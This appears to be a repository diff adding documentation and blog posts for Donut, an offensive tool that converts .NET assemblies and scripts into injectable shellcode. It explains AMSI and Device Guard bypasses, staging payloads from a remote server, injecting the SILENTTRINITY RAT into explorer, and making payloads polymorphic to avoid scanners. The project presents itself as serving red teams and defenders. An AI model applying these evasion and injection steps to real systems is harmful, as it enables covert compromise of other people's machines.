128 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
129
130 ```
131 nmake clean -f Makefile.msvc
132 nmake x86 -f Makefile.msvc
133 ```
134
135 This will save the shellcode as a C array to *payload_exe_x86.h*.
136
137 ### Mingw-w64
138
139 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
140
141 ```
142 make clean -f Makefile.mingw
143 make -f Makefile.mingw
144 ```
145
146 Once you've recompiled for all architectures, you may rebuild donut.
147
148 ## Bypasses
149
150 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
151
152 * AMSI in .NET v4.8
153 * Device Guard policy preventing dynamicly generated code from executing
154
155 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
156
157 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
158
159 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
160
161 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
162
163 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
164
165 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
166
167 ### Additional features.
168
169 These are left as exercises to the reader. I would personally recommend:
170
171 * Add environmental keying
172 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
173 * Integrate donut as a module into your favorite RAT/C2 Framework
174
175 ## Disclaimers
176
177 * No, we will not update donut to counter signatures or detections by any AV.
178 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
179
180 # How it works
181
182 ## Procedure for Assemblies
183
184 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
185
186 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
187
188 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
189
190 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
191
192 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
193
194 ## Procedure for ActiveScript/XSL
195
196 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
197
198 ## Procedure for PE Loading
199
200 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
201
202 ## Components
203
204 Donut contains the following elements:
205
206 * donut.c: The source code for the donut payload generator
207 * donut.exe: The compiled payload generator as an EXE
208 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
209 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
210 * setup.py: The setup file for installing Donut as a Pip Python3 module.
211 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
212 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
213 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
214 * payload/payload.c: Main file for the shellcode.
215 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
216 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
217 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
218 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
219 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
220 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
221 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
222 * payload/http_client.c: Downloads a module from remote staging server into memory.
223 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
224 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
225 * payload/inject.exe: The compiled C shellcode injector
226 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
227 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
228 * payload/runsc.exe: The compiled C shellcode runner
229 * payload/exe2h/exe2h.c: Source code for exe2h
230 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
231 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
232 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
233
234 # Subprojects
235
236 There are three companion projects provided with donut:
237
238 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
239 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
240 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
241 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
242
243 # Project plan
244
245 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
246 * Create a C# version of the generator.
247 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
248 * Add support for HTTP proxies.
249 ~~* Find ways to simplify the shellcode if possible.~~
250 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
251 * ~~Dynamic Calls to DLL functions.~~
252 * Handle the ProcessExit event from AppDomain using unmanaged code.
+58
-0
docs/2019-08-21-Python_Extension.md less more
0 # Python Extension
1
2 A Python C extension is now available which allows you to dynamically generate donut shellcode in Python.
3
4 ## Requirements
5
6 The extension has only been tested in Python 3.7, it shouldn't have any compatibility issues with older 3.X versions of Python.
7
8 It will ***not*** work in Python 2.x.
9
10 ## Installing the Extension
11
12 (Once the extension has been published to PyPi)
13 ```
14 pip3 install donut-shellcode
15 ```
16
17 ## Manually Compiling And Installing the Extension
18
19 ```bash
20 git clone https://github.com/TheWover/donut && cd donut
21 pip3 install . # or python setup.py install
22 ```
23
24 ## Usage
25
26 The Python extension accepts the same parameters as the main donut executable.
27
28 Here's a minimalistic example of using the extension:
29
30 ```python
31 import donut
32 shellcode = donut.create(file="naga.exe", params='https://172.16.164.1/')
33 ```
34
35 The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
36
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode.
38
39 ```python
40 import donut
41
42 shellcode = donut.create(
43 file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
44 url='http://127.0.0.1', # HTTP server that will host the donut module
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
47 cls='namespace.class', # Optional class name. (required for .NET DLL)
48 method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
49 params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon.
50 runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
51 appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
52 )
53 ```
54
55 ## Author
56
57 The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
+154
-0
docs/2019-5-31-Apple-Fritter.md less more
0 ---
1 layout: post
2 title: Donut v0.9.1 "Apple Fritter" - Dual-Mode Shellcode, AMSI, and More
3 ---
4
5 *TLDR: Version v0.9.1 "Apple Fritter" of Donut has been released, including dual-mode (AMD64+x86) shellcode, AMSI bypassing for .NET v4.8, automatic version detection of payloads, better support for Program.Main().*
6
7 # Introduction
8
9 In case you are unaware, [Donut](https://github.com/TheWover/donut "Donut") is a shellcode generation tool that creates native shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
10
11 Today, we released version v0.9.1. The major features include:
12
13 * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
14 * Automatic detection of the CLR version required for .NET Assembly payloads.
15 * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
16 * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
17 * Bypass for Device Guard policy preventing execution of dynamically generated .NET code
18 * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
19
20 # Feature Breakdown
21
22 ## Dual-Mode Shellcode
23
24 Odzhan knew an old trick for crafting shellcode that can run in either x86 or x64 Windows processes using REX prefixes. We combine the x86 and x64 shellcode with a stub that "detects" the architecture of the process. The layout in memory looks like:
25
26 ```
27 --------------------------------------------------
28 | detection stub | x64 shellcode | x86 shellcode |
29 --------------------------------------------------
30 ```
31
32 And the logic:
33
34 ```assembly
35 0x31C0 xor eax, eax // null eax
36 0x48 dec eax // decrement eax to produce an underflow
37 0x0F88 js dword x86_code // jump to x86 payload if we are in a WOW64 process
38 <x64_code> // the x64 PIC machine code for the payload
39 <x86_code> // the x86 PIC machine code for the payload
40 ```
41
42 There are two ways this code can execute.
43
44 If the process is WOW64 (x86):
45
46 1) ```eax``` will be nulled.
47 2) ```eax``` will be decremented, resulting in an underflow.
48 3) Since the sign flag is set from the underflow, the condition for the jump is satisfied. Jump to the x86 shellcode.
49
50 If the process is x64:
51
52 1) ```eax``` will be nulled.
53 2) ```0x48``` is an REX prefix for the next instruction
54 3) The previous REX prefix is not valid for the ```js``` instruction. As such, nothing happens.
55 4) Since the x64 PIC is immediately following the previous instruction in memory, ```eip``` is now pointing at the first instruction in the x64 PIC. It now executes.
56
57 Starting in the v0.9.1 "Apple Fritter" release, dual-mode shellcode is the default. You may still tell Donut to produce x86 or x64 shellcode, rather than AMD64+x86.
58
59 Naturally, the dual-mode PIC will be larger than the other options. If the size of the PIC matters, use the version for the particular process you are targeting. Or, have your injector check the architecture of the target process before injecting into it. If not, use the dual-mode version to ensure maximum compatbility with host processes.
60
61 ## Auto-Detect CLR Version
62
63 Rather than require the user to specify the CLR version, we now read the headers of the .NET Assembly to determine the appropriate CLR version.
64
65 The .NET Assembly file format is an extension of the regular [PE Format](https://en.wikipedia.org/wiki/Portable_Executable) used by Windows executables. One of the optional fields used by .NET is the ```IMAGE_COR20_HEADER```, which references a ```STORAGESIGNATURE``` structure containing the version details necessary to load the correct runtime. We check the ```iVersionString``` variable to get the exact version requirement for your Assembly. Please note, the names of these data structures and variables are somewhat arbitrary. I am borrowing [dnSpy's](https://github.com/0xd4d/dnSpy) terminology so that I can show you these two pretty pictures.
66
67 The relevant layout of the .NET headers in my SafetyKatz DLL as stored on disk:
68
69 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/headers_in_PE.PNG)
70
71 And what the ```STORAGESIGNATURE``` structure actually looks like:
72
73 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/structured_headers.PNG)
74
75 If you do not want us to automatically determine the version number, you may still manually specify what version to use with the `-r` flag.
76
77
78 ## Main Entry Point
79
80 The original version of Donut did not handle Main entry points for EXEs well due to the fact that it uses an object array as its function signature rather than a string array. We now correctly handle this so that you don't have to know about the difference. :-)
81
82 ## AMSI Patching
83
84 To provide some context, AMSI integration has been added to the new version of the .NET Framework. It has also been ported to [.NET Core](https://github.com/dotnet/coreclr/issues/21370).
85
86 Specifically, AMSI integration was added to the CLR itself so that any .NET Assemblies loaded from memory will be scanned with ```AmsiScanBuffer``` from ```amsi.dll``` before they are loaded. If the result of ```AmsiScanBuffer``` is anything but ```S_OK``` it will return an ```HRESULT``` error code. This affects everything that loads Assemblies from memory using the CLR, including ```System.Reflection.Assembly.Load```, Donut shellcode, and (presumably if I could test it) Cobalt Strike's ```execute-assembly``` command.
87
88 When you try to load a .NET Assembly from memory that is known to be malicious, you get a Defender alert that looks like the picture below. Notice that data source was AMSI, and that the process it was running in is ```notepad.exe```. The assembly was injected into notepad through Donut shellcode.
89
90 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/donut_AMSI.PNG)
91
92 However, their implementation of AMSII integration is subject to memory patching bypasses in the same way that PowerShell is. We developed on existing research, produced some custom bypasses, and added a modular bypass system to Donut that lets you choose which technique you would like to use.
93
94 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) detailing each of the AMSI bypasses we added to Donut. It is important to note that there could be many more. I believe that anyone who sits down to do the research and develop an AMSI bypass will probably come up with their own slightly different variant. As long as Microsoft continues to rely on calling DLL functions from user-level memory space, AMSI will be subject to memory patching bypasses.
95
96 The result looks like the picture below. I safely injected SafetyKatz into ```notepad.exe``` using Donut shellcode, even thought AMSI was used. Defender shows no detections.
97
98 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/amsi_is_dead.PNG)
99
100 I must strongly emphasize, the fact that 4.8 AMSI can be bypassed like in PowerShell does NOT make it useless. This new AMSI is a *good thing* that will benefit .NET Security. It incurs cost upon adversaries. Use it. But also recognise that, like everything, it has its limitations.
101
102 ### Modular Bypass System
103
104 As we researched bypasses for AMSI, it became clear that there is many ways to do it. It would be silly to force users of Donut to have to use whatever we came up with. As such, we ensured that you may easily add your own bypass or customize one of ours. The bypasses are defined in ```payload/bypass.c```. You may either modify our C code, or add your own. Each bypass implements the same ```BOOL DisableAMSI(PDONUT_INSTANCE inst)``` function and is wrapped in an ```#ifdef BYPASS_NAME``` preprocessor directive. To change which bypass is used, change the Makefile to define the bypass name specified by the directive.
105
106 For example, you could change the relevant line in ```payload/Makefile.msvc``` from
107
108 ```
109 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
110 ```
111
112 To:
113
114 ```
115 cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
116 ```
117
118 In order to switch from using BypassA to BypassB.
119
120 This system not only makes it easy to change the bypass technique, but also reduces the size, complexity, and signaturability of the shellcode by ensuring that code you are not using is present in the PIC to be found by AV/EDR.
121
122 ## Device Guard Dynamic Code Prevention Bypass
123
124 Windows Defender Device Guard includes an optional policy for disabling dynamically-generated .NET code from executing. Because it was mixed-in with the AMSI scanning code, we went ahead and disabled it too. Not sure if that will help anyone, but hey it was easy. ¯\_(ツ)_/¯
125
126 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/code_integrity.png)
127
128 # Conclusion
129
130 Donut v0.9.1 "Apple Fritter" represents the first improvements to Donut. More improvements are coming as we have time to make them. In the meantime, Donut is still in Beta so we welcome feedback and testing.
131
132 I know that several people have already had difficulties integrating Donut into their toolsets because of the complexity of the data structures it uses. To help with this, our plan for the full release (version 1.0) is to produce C# and Python generators. That will be the primary focus of our efforts moving forward.
133
134 ## Plans
135
136 Below is the current version release plan for Donut.
137
138 * v0.9.1:
139 * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
140 * Automatic detection of the CLR version required for .NET Assembly payloads.
141 * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
142 * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
143 * Bypass for Device Guard policy preventing execution of dynamically generated .NET code
144 * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
145 * v1.0:
146 * C# generator
147 * C# wrapper for our dynamic library
148 * Python generator
149 * Python wrapper for our dynamic library
150 * Better documentation for debugging, designing with, and integrating Donut.
151 * v1.1:
152 * Automatic unloading of Application Domains after the Assembly finishes executing.
153 * Support for HTTP proxies
+336
-0
docs/2019-5-9-Introducing-Donut.md less more
0 ---
1 layout: post
2 title: Donut - Injecting .NET Assemblies as Shellcode
3 ---
4
5 *TLDR: You can now inject .NET Assemblies into Windows processes using this repo: https://github.com/TheWover/donut/*
6
7 # Advancing Tradecraft - Context
8
9 Offensive and red team tradecraft have changed significantly in the past year. As anti-malware systems improve their capability to detect and deter offensive tools, attackers are shifting their focus to technologies that are not observed by AV. Currently, that means operating entirely in memory and avoiding dropping files onto disk. In the Windows world, the .NET Framework provides a convenient mechanism for this. It is, however, severely restricted in that .NET programs cannot be injected directly into remote processes. In this article, we will address this issue by describing how to inject .NET code into processes via shellcode.
10
11 ## .NET Primer
12
13 Before we begin, you must understand a few important components of .NET.
14
15 <details>
16 <summary>Click to expand the primer!</summary>
17
18 * [Common Language Runtime](https://docs.microsoft.com/en-us/dotnet/standard/clr "Common Language Runtime"): Like Java, .NET uses a runtime environment (or "virtual machine") to interpret code at runtime. All .NET Code is compiled from an intermediate language to native code "Just-In-Time" before execution.
19 * [Common Intermediate Language](https://docs.microsoft.com/en-us/dotnet/standard/managed-code "Common Intermediate Language"): Speaking of an intermediate language, .NET uses CIL (also known as MSIL). All .NET languages (of which there are many) are "assembled" to this intermediate language. CIL is a generic object-oriented assembly language that can be interpreted into machine code for any hardware architecture. As such, the designers of .NET languages do not need to design their compilers around the architectures they will run on. Instead, they merely need to design it to compile to one language: CIL.
20 * [.NET Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/assemblies-in-the-common-language-runtime ".NET Assemblies"): .NET applications are packaged into .NET Assemblies. They are so called because the code from your language of choice has been "assembled" into CIL but not truly compiled. Assemblies use an extension of the PE format and are represented as either an EXE or a DLL that contains CIL rather than native machine code.
21 * [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains "Application Domains"): Assemblies are run inside of a safe "box" known as an Application Domain. Multiple Assemblies can exist within an AppDomain, and multiple AppDomains can exist within a process. AppDomains are intended to provide the same level of isolation between executing Assemblies as is normally provided for processes. Threads may move between AppDomains and can share objects through marshalling and delegates.
22 </details>
23
24 ## Current state of .NET Tradecraft
25
26 Currently, .NET tradecraft is limited to post-exploitation execution by one of two main ways:
27
28 * Assembly.Load(): The .NET Framework's standard library includes an API for [code reflection](https://en.wikipedia.org/wiki/Reflection_(computer_programming)). This Reflection API includes System.Reflection.Assembly.Load, which can be used to load .NET programs from memory. In less than five lines of code, you may load a .NET DLL or EXE from memory and execute it.
29 * execute-assembly: In Cobalt Strike 3.11, Raphael Mudge introduced a command called 'execute-assembly' that ran .NET Assemblies from memory as if they were run from disk. This command introduced the world to .NET tradecraft and signalled the shift to [Bringing Your Own Land](https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html).
30
31 However, both execution vectors produce challenges for red teams seeking to develop flexible TTPs.
32
33 ## Assembly.Load
34
35 While the Reflection API is very versatile and can be useful in many different ways, it can only run code in the current process. No support is provided for running payloads in remote processes.
36
37 ## execute-assembly
38
39 The main problem with execute-assembly is that it executes the same way every time. That predictability ensures that it is reliable, but also lets defenders built analytics.
40
41 1. A subprocess is created using the *spawnto* executable. Mudge refers to this as a "sacrificial process" because it acts as a host for your payloads, isolating your Beacon's process from any failure in your code.
42 2. A reflective DLL is injected into the subprocess to load the .NET Runtime.
43 3. The reflective DLL loads an intermediate .NET Assembly to handle errors and improve the stability of your payload.
44 4. The intermediate .NET Assembly loads your .NET Assembly from memory inside the subprocess.
45 5. The main entry point of your Assembly is invoked along with your command-line arguments.
46
47 The result is that execute-assembly *does* allow you to inject your .NET Assembly into a remote process. However, it does not let you inject into a running process or specify how that injection occurs. It is only modular in *what* you can run, not *how* you can run it. The most that you can do is to specify what exceutable is run for your sacrificial subprocess by changing the *spawnto* variable in your Malleable C2 Profile. execute-assembly also has a hidden size limitation of 1 MB for your payloads, which limits your flexibility in designing post-exploitation tools.
48
49 ## Moving Forward
50
51 To move past these limitations, we need a technique that meets the following requirements:
52
53 * Allows you to run .NET code from memory.
54 * Can work with any Windows process, regardless of its architecture and whether it has the CLR loaded.
55 * Allows you to inject that code in either a remote (different) process or the local (current) process.
56 * Allows you to determine in what way that injection occurs.
57 * Works with multiple types of process injection.
58
59 The most flexible type of payload that meets those requirements is shellcode. But you can't just convert a .NET Assembly to shellcode. They run through a runtime environment, not directly on the hardware. Wouldn't it be great if we could just inject .NET Assemblies as shellcode? Yes. Yes, it would.
60
61 # Introducing Donut
62
63 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/donut.png)
64
65 ```Shortly before publishing donut, Odzhan and I became aware of another team working on a shellcode generator for .NET Assemblies. They were at the same stage of their project at us. We both agreed that whomever of us published first would ensure that the other received due credit for their work. As soon as they publish their tool, we will update this article with a link.```
66
67 Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
68
69 Donut is currently at version 0.9 (Beta). Please share any issues or suggestions with us as Issues on GitHub. Once we have received feedback, we will release version 1.0. A link to the compiled v0.9 release can be found [here](https://github.com/TheWover/donut "Release 0.9").
70
71 # How it Works
72
73 ## Unmanaged Hosting API
74
75 Microsoft provides an API known as the [Unmanaged CLR Hosting API](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/). This API allows for unmanaged code (such as C or C++) to host, inspect, configure, and use Common Language Runtimes. It is a legitimate API that can be used for many purposes. Microsoft uses it for several of their products, and other companies use it to design custom loaders for their programs. It can be used to improve performance of .NET applications, create sandboxes, or just do wierd stuff. We do the latter.
76
77 One of the things it can do is manually load .NET Assemblies into arbitrary [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains). It can do this either from disk or from memory. We utilize its capability for loading from memory to load your payload without touching disk.
78
79 To see a standalone example of an Unmanaged CLR Hosting Assembly loader, check out Casey Smith's repo: [AssemblyLoader](https://github.com/caseysmithrc/AssemblyLoader)
80
81 ## CLR Injection
82
83 The first action that donut's shellcode takes is to load the CLR. Unless the user specifies the exact runtime version to use, v4.0.30319 of the CLR will be used by default, which supports the versions 4.0+ of .NET. If the attempt to load a specific version fails, then donut will attempt to use whichever one is avialable on the system. Once the CLR is loaded, the shellcode creates a new Application Domain. At this point, the .NET Assembly payload must be obtained. If the user provided a staging URL, then the Assembly is downloaded from it. Otherwise, it is obtained from memory. Either way, it will loaded into the new AppDomain. After the Assembly is loaded but before it is run, the decrypted copy will be released and later freed from memory with VirtualFree to deter memory scanners. Finally, the Entry Point specified by the user will be invoked along with any provided parameters.
84
85 If the CLR is already loaded into the host process, then donut's shellcode will still work. The .NET Assembly will just be loaded into a new Application Domain within the managed process. .NET is designed to allow for .NET Assemblies built for multiple versions of .NET to run simultaneously in the same process. As such, your payload should always run no matter the process's state before injection.
86
87 ## Shellcode Generation
88
89 The logic above describes how the shellcode generated by donut works. That logic is defined in payload.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in payload.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
90
91 # Using Donut
92
93 Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Both a Windows EXE and a Python (Python planned for v1.0) script are provided for payload generation. The command-line syntax is as described below.
94
95 ```
96 usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method>
97
98 -f <path> .NET assembly to embed in PIC and DLL.
99 -u <URL> HTTP server hosting the .NET assembly.
100 -c <namespace.class> The assembly class name.
101 -m <method> The assembly method name.
102 -p <arg1,arg2...> Optional parameters for method, separated by comma or semi-colon.
103 -a <arch> Target architecture : 1=x86, 2=amd64(default).
104 -r <version> CLR runtime version. v4.0.30319 is used by default.
105 -d <name> AppDomain name to create for assembly. Randomly generated by default.
106
107 examples:
108
109 donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll
110 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/
111 ```
112
113 ## Generating Shellcode
114
115 To generate shellcode with donut, you must specify a .NET Assembly, an Entry Point, and any parameters that you wish to use. If your Assembly uses the *Test* namespace and includes the *Program* class with the *Main* method, then you would use the following options:
116
117 ```
118 donut.exe -f Test.exe -c Test.Program -m Main
119 ```
120
121 To generate the same shellcode for 32-bit processes, use the '-a' option:
122
123 ```
124 donut.exe -a 1 -f Test.exe -c Test.Program -m Main
125 ```
126
127 You may also provide parameters to whatever Entry Point you specify. The max length of each parameter is currently 32 characters. To demonstrate this functionality, you may use the following options and our example Assembly to create shellcode that will spawn a Notepad process and a Calc process:
128
129 ```
130 .\donut.exe -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
131 ```
132
133 When generating shellcode to run an an older Windows machine, you may need it to use v2 of the CLR, rather than v4. v2 works for versions of the .NET Framework <= 3.5, while v4 works for versions >= 4.0. By default, donut uses version 4 of the CLR. You may tell it to use v2 with the '-r' option and specifying "v2.0.50727" as the parameter.
134
135 ```
136 .\donut.exe -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
137 ```
138
139 The name of the AppDomain for your .NET payload may be specified manually using the '-d' option. By default, it will be randomly generated. You may specify a name.
140
141 ```
142 .\donut.exe -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
143 ```
144
145 In order to reduce the size of your shellcode (or for many other reasons), you may specify a URL where your payload will be hosted. Donut will produce an encrypted Donut Module with a random name that you should place at the URI you specified. The name and location where you should place it will be printed to your screen when you generate the shellcode.
146
147 ```
148 .\donut.exe -u http://remote_server.com/modules/ -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
149 ```
150
151 ## Demonstrating with SILENTTRINITY
152
153 For a demonstration, we will use the [SILENTTRINITY RAT](https://github.com/byt3bl33d3r/SILENTTRINITY "SILENTTRINITY") as a test payload. Since it is the most... ahh... complicated .NET Assembly that I could find, I used it for all of my testing. You may use any standard shellcode injection technique to inject the .NET Assembly. The DonutTest subproject is provided in the repo as an example injector. You may combine it with the DemoCreateProcess subproject to test the shellcode generator. In our case, we will first use DonutTest to inject into explorer. We also show what it looks like to use an existing implant to perform further injection using the ``` boo/shellcode ``` and ``` ipy/execute-assembly ``` post-exploitation modules.
154
155 ### Generation
156
157 First, we will generate a x64 PIC using the SILENTTRINITY DLL. Using PowerShell, we will base64-encode the result and pipe it to our clipboard.
158
159 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy.png)
160
161 Because we don't know what processes will be available to inject into on-target, we will also generate a x86 PIC just in case we need it.
162
163 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy_86.png)
164
165 If you wanted to, you could use a staging server by providing the URL and copying the Donut Module to the specified location.
166
167 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/generate_URL.png)
168
169 ### Choosing a Host Process
170
171 Use ProcessManager, a sub-project provided in the donut repo, to enumerate processes. ProcessManager enumerates all running processes and makes a best effort to obtain information about them. It is specifically designed to aid in determining what process to inject / migrate into. The picture below demonstrates its general usage.
172
173 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ProcessManager.jpg)
174
175 ### Injecting
176
177 First, we will use DonutTest to inject into explorer using DonutTest.
178
179 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_inject.jpg)
180
181 As you can see, the injection was successfull:
182
183 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_success.png)
184
185 Now assume we already have an agent running on the machine. We can use SILENTTRINITY's post-exploitation modules to inject implants into running processes.
186
187 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_through_agent.png)
188
189
